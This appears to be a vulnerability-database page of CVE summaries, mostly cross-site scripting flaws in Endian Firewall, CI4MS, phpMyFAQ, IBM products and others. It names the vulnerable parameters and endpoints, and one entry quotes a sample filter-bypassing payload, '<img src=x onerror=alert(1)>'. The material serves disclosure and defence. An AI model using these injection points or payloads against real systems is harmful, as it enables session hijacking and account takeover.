Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject malicious JavaScript via the remark parameter in /cgi-bin/zonefw.cgi, which persists and executes when other administrators or users access the affected configuration page. The vulnerability requires user interaction (UI:P) and authenticated access (PR:L), limiting immediate risk but enabling account compromise and lateral movement within firewall administrative interfaces.
Endian Firewall 3.3.25 and earlier allows authenticated users to store arbitrary JavaScript in the remark parameter of /cgi-bin/outgoingfw.cgi, which executes when other users view the affected page. This stored cross-site scripting (XSS) vulnerability requires valid login credentials but can compromise session tokens, hijack administrative actions, or perform lateral attacks within the firewall management interface. No public exploit code or active exploitation has been confirmed at time of analysis.
Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and earlier allows authenticated attackers to inject arbitrary JavaScript through the remark parameter in /cgi-bin/incoming.cgi, which is then executed when other users access the affected page. The vulnerability requires user interaction (UI:P) and authenticated access (PR:L), resulting in a CVSS 5.1 score with limited scope impact; no public exploit code or active exploitation has been confirmed.
Stored XSS in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject malicious JavaScript via the remark parameter in /cgi-bin/snat.cgi, which persists and executes when other administrators or users access the affected page. The vulnerability requires low-privilege authentication and user interaction (page view), limiting immediate impact but creating persistent data integrity and session hijacking risks within the appliance administrative interface.
Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated users to inject malicious JavaScript via the remark parameter in /cgi-bin/dnat.cgi, which persists and executes when other administrators or users access the affected page. This requires valid login credentials but can compromise the integrity and confidentiality of management sessions for other users.
Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the dscp parameter in the QoS rules management interface (/manage/qos/rules/). When other authenticated users view the affected configuration page, the injected script executes in their browser context, enabling session hijacking, credential theft, or lateral movement within the firewall management console. EPSS exploitation likelihood is elevated while severity is moderate (CVSS 5.1); no public exploit code or active exploitation has been confirmed.
Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the name parameter in the QoS classes management interface (/manage/qos/classes/), which is executed when other users access the affected page. The vulnerability requires user interaction and authentication, resulting in a CVSS 5.1 score with limited scope of impact; no public exploit code or active exploitation has been confirmed.
Stored cross-site scripting (XSS) in Endian Firewall version 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the remark user ham spam parameter in /cgi-bin/salearn.cgi. The injected payload is stored and executed in the browsers of other users who view the affected page, enabling session hijacking, credential theft, or malware distribution. No public exploit code or active exploitation has been confirmed; real-world risk is limited by the authentication requirement and user interaction dependency.
Endian Firewall 3.3.25 and earlier contains stored cross-site scripting (XSS) in the DHCP fixed leases management interface, where the remark parameter fails to sanitize user input. An authenticated attacker can inject malicious JavaScript into the remark field at /manage/dhcp/fixed_leases/ that persists in the application and executes in the browsers of other administrators viewing the same page, enabling session hijacking, credential theft, or unauthorized configuration changes. No public exploit code or active exploitation has been confirmed; however, the vulnerability requires only low-privilege authentication and normal user interaction to trigger.
Stored cross-site scripting in Endian Firewall 3.3.25 and earlier allows authenticated attackers to inject arbitrary JavaScript via the NAME parameter in /cgi-bin/uplinkeditor.cgi, which is executed when other users access the affected page. The vulnerability requires user interaction (UI:P) and low privileges (PR:L), limiting immediate automated exploitation but enabling account compromise and lateral privilege escalation within authenticated user populations. No public exploit code or active exploitation has been identified at time of analysis.
Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the remark parameter in the /manage/dnsmasq/hosts/ endpoint. The injected payload is stored server-side and executed in the browsers of any user who subsequently views the affected page, enabling session hijacking, credential theft, or malware distribution. CVSS 5.1 reflects the moderate impact and requirement for user interaction; no public exploit code or active exploitation has been confirmed at time of analysis.
Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject malicious JavaScript via the remark parameter in /cgi-bin/routing.cgi, which persists and executes when other users access the affected page. The vulnerability requires user interaction (UI:P) and authenticated access (PR:L), limiting its immediate blast radius, but enables session hijacking, credential theft, or administrative impersonation within the firewall management interface.
Cross-site scripting (XSS) in Progress Flowmon prior to versions 12.5.8 and 13.0.6 allows attackers to execute arbitrary actions within an administrator's authenticated session by tricking them into clicking a malicious link. The vulnerability exploits insufficient input validation or output encoding, enabling attackers to inject and execute malicious scripts in the context of a trusted user's browser session.
Stored cross-site scripting (XSS) in Xiaopi Panel 1.0.0 via the param argument in /demo.php allows authenticated remote attackers to inject malicious scripts that execute in users' browsers. The vulnerability affects the WAF Firewall component, has publicly available exploit code, and carries a low CVSS score (3.5) due to the requirement for user interaction and limited impact scope, though the vendor has not responded to disclosure.
DOM-based cross-site scripting (XSS) in MSTW League Manager WordPress plugin through version 2.10 allows authenticated attackers to inject malicious scripts that execute in the context of other users' browsers, potentially stealing session tokens, modifying league data, or performing actions on behalf of victims. The vulnerability requires user interaction (UI:R) and affects the plugin across all versions up to 2.10.
SEPPmail Secure Email Gateway before version 15.0.3 allows unauthenticated attackers to inject arbitrary HTML into notification emails about new CA certificates, enabling stored cross-site scripting (XSS) attacks against email recipients. An attacker with the ability to trigger CA certificate notifications can craft malicious HTML payloads that execute when recipients view the notification email, potentially leading to credential theft, malware distribution, or further compromise of email infrastructure. No public exploit code or active exploitation has been confirmed at the time of analysis.
Stored cross-site scripting (XSS) in SourceCodester Simple Customer Relationship Management System 1.0 allows authenticated remote attackers to inject malicious scripts via the Description parameter in the /create-ticket.php Create Ticket component. The vulnerability requires user interaction (UI:R) to trigger payload execution and has limited impact (integrity only, no confidentiality or availability loss), but publicly available exploit code exists and the issue has been publicly disclosed.
Reflected cross-site scripting (XSS) in itsourcecode Payroll Management System up to version 1.0 allows remote attackers to inject malicious scripts via the 'page' parameter in /navbar.php. The vulnerability requires user interaction (UI:R per CVSS vector) but carries a low CVSS score of 4.3 due to limited confidentiality impact. Publicly available exploit code exists, increasing real-world risk despite the moderate base score.
Authenticated stored cross-site scripting (XSS) in IBM Content Navigator versions 3.0.15, 3.1.0, and 3.2.0 allows logged-in users to inject arbitrary JavaScript into the Web UI, potentially enabling credential theft or session hijacking within trusted browser contexts. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting exposure to insider threats and social engineering scenarios where victims click attacker-controlled links. No public exploit code or active exploitation has been confirmed; patch availability from IBM mitigates the risk for patched deployments.
Reflected cross-site scripting (XSS) vulnerabilities in the Interzen Consulting ZenShare Suite v17.0 login.php endpoint allow remote unauthenticated attackers to execute arbitrary JavaScript in a user's browser by injecting malicious payloads into the codice_azienda and red_url parameters. The attack requires user interaction (clicking a crafted link) and affects the authentication process; no public exploit code or active exploitation has been confirmed at time of analysis.
Reflected XSS in Interzen Consulting ZenShare Suite v17.0 login_newpwd.php endpoint allows unauthenticated remote attackers to execute arbitrary JavaScript in users' browsers by injecting malicious code into the codice_azienda parameter via a crafted URL. No public exploit code or active exploitation has been confirmed at the time of this analysis, though the vulnerability is straightforward to demonstrate and likely poses a practical risk to organizations using this product.
Session fixation in listmonk v6.0.0 allows authenticated sessions to persist after password reset or password change, enabling attackers with stolen session cookies to maintain account access despite credential recovery by the victim. Authenticated remote attackers (PR:L) can exploit this to retain high confidentiality impact access. No public exploit code identified at time of analysis, though the vulnerability is trivially reproducible per the detailed proof-of-concept. EPSS data not available; vulnerability confirmed in production release v6.0.0 via GitHub Security Advisory.
Stored XSS via HTML entity-encoded javascript: URLs in SVG files in phpMyFAQ enables privilege escalation from editor to admin. The regex-based sanitizer in SvgSanitizer.php fails to detect entity-encoded forms of javascript: URLs, allowing any user with edit_faq permission to upload malicious SVGs that execute arbitrary JavaScript in admin browsers. A publicly available proof-of-concept demonstrates both basic XSS and complete admin account creation, with confirmed working exploitation in Chrome 146 and Edge.
HTML injection in IBM Aspera Shares 1.9.9 through 1.11.0 allows authenticated remote attackers with high privileges to inject malicious HTML that executes in victim browsers within the hosting site's security context, requiring user interaction to view the injected content. CVSS 4.8 indicates low overall severity; patch is available from IBM.
HTTP header injection in IBM Aspera Shares 1.9.9 through 1.11.0 allows authenticated attackers to conduct cross-site scripting, cache poisoning, and session hijacking attacks via improper validation of HOST headers. The vulnerability requires authenticated access and carries a CVSS score of 5.4 with moderate confidentiality and integrity impact. No public exploit code or active exploitation has been confirmed.
Stored cross-site scripting in IBM Aspera Shares 1.9.9 through 1.11.0 allows authenticated high-privilege users to inject arbitrary JavaScript into the Web UI, potentially enabling credential theft or session hijacking within trusted browser sessions. CVSS 5.5 reflects the requirement for elevated privileges but global scope impact; no public exploit or active exploitation confirmed.
Stored cross-site scripting (XSS) in phpMyFAQ allows authenticated administrators to inject unquoted or single-quoted event handler attributes that bypass the content sanitization pipeline, resulting in arbitrary JavaScript execution for all FAQ page visitors. The vulnerability exists in the removeAttributes() regex filter (line 174 of Filter.php) which only matches double-quoted HTML attributes, allowing payloads like <img src=x onerror=alert(1)> to persist and execute in the browser when the FAQ is rendered with the |raw Twig filter. Despite requiring administrator privileges to create the malicious FAQ, the XSS executes for all unauthenticated and authenticated users viewing the public FAQ page, enabling session hijacking, credential theft, and malware distribution.
Stored XSS in DbGate npm package escalates to remote code execution in Electron desktop app via unsanitized SVG icon rendering. Attackers who inject malicious SVG payloads into application definition files can execute arbitrary JavaScript when victims view matching database entries. In the Electron desktop client, insecure configuration (nodeIntegration: true, contextIsolation: false) allows XSS payloads to invoke Node.js APIs, enabling local code execution including file system access. Web deployments face session hijacking and credential theft. EPSS data not available; vendor patch released via GitHub commit a7d2ed1. No active exploitation confirmed (not in CISA KEV), but detailed proof-of-concept demonstrates both XSS and RCE paths.
HTTP response splitting in ewe's encode_headers function allows remote attackers to inject arbitrary HTTP response headers and content by embedding CRLF sequences in user-controlled response header values, enabling cache poisoning and cross-site scripting attacks. The vulnerability affects ewe versions that do not validate outgoing response header keys and values, despite implementing equivalent validation for incoming request headers. A proof-of-concept demonstrates injection of custom headers through a redirect URL parameter passed directly to the Location header without sanitization.
Stored cross-site scripting in CI4MS backend user management allows authenticated attackers with low-level privileges to inject malicious JavaScript that executes automatically when administrators access affected pages, enabling session hijacking and full administrative account takeover. The vulnerability affects all versions prior to 0.31.0.0 with a critical CVSS score of 9.9 due to scope change and high impact across confidentiality, integrity, and availability. EPSS data not available; no public exploit code or active exploitation confirmed at time of analysis, though the technical barrier is low (AC:L, PR:L).
Stored cross-site scripting in CI4MS blog category management allows authenticated users to inject malicious JavaScript that executes across multiple application contexts including public blog pages and administrative interfaces. Affecting all versions prior to 0.31.0.0, attackers with low-privilege authenticated access can achieve scope change with high impact to confidentiality, integrity, and availability (CVSS 9.9). Vendor-released patch available in version 0.31.0.0. No public exploit identified at time of analysis, though EPSS data unavailable and exploitation is straightforward given low attack complexity.
Stored cross-site scripting in CI4MS blog module allows authenticated attackers to inject malicious JavaScript that executes in victims' browsers across multiple application views. The vulnerability affects all versions prior to 0.31.0.0 and stems from insufficient input sanitization when creating or editing blog posts combined with unsafe output rendering. Attack requires low-privilege authentication (PR:L) but has scope change (S:C), enabling session hijacking and credential theft across user contexts. Vendor-released patch available in version 0.31.0.0. EPSS and KEV data not provided; no public exploit identified at time of analysis.
Stored cross-site scripting in CI4MS (CodeIgniter 4 CMS) allows authenticated users with blog post management privileges to inject malicious JavaScript through unsanitized category fields, affecting all users who view blog posts containing the poisoned categories. The vulnerability is confirmed patched in version 0.31.0.0. With CVSS 9.1 (Critical) due to scope change and high confidentiality impact, and low attack complexity requiring only low-privilege authentication, this represents significant risk in multi-user CMS environments despite no confirmed active exploitation (no CISA KEV listing) or public exploit code identified at time of analysis.
Stored cross-site scripting (XSS) in CI4MS page management functionality allows authenticated attackers to inject malicious JavaScript that executes in both administrative contexts and public-facing pages. Affecting CI4MS versions prior to 0.31.0.0, this vulnerability requires low-privilege authentication (PR:L) but enables scope change (S:C) with network-based remote exploitation (AV:N) and low attack complexity (AC:L). Vendor-released patch version 0.31.0.0 addresses the input sanitization failures. No public exploit identified at time of analysis; CVSS 9.1 reflects the scope change and cross-context impact enabling privilege escalation and potential administrator session compromise.
Stored cross-site scripting (XSS) in CI4MS menu management allows authenticated users with low privileges to inject malicious scripts that execute in administrator and public user contexts. Affecting CI4MS versions prior to 0.31.0.0, attackers can exploit insufficient input sanitization when adding Posts to navigation menus, achieving cross-scope code execution (CVSS scope changed) with potential for session hijacking and administrative account compromise. Vendor-released patch available in version 0.31.0.0. No public exploit identified at time of analysis, though EPSS data not available for risk quantification.
Quick Facts
- Typical Severity: MEDIUM
- Category: web
- Total CVEs: 9946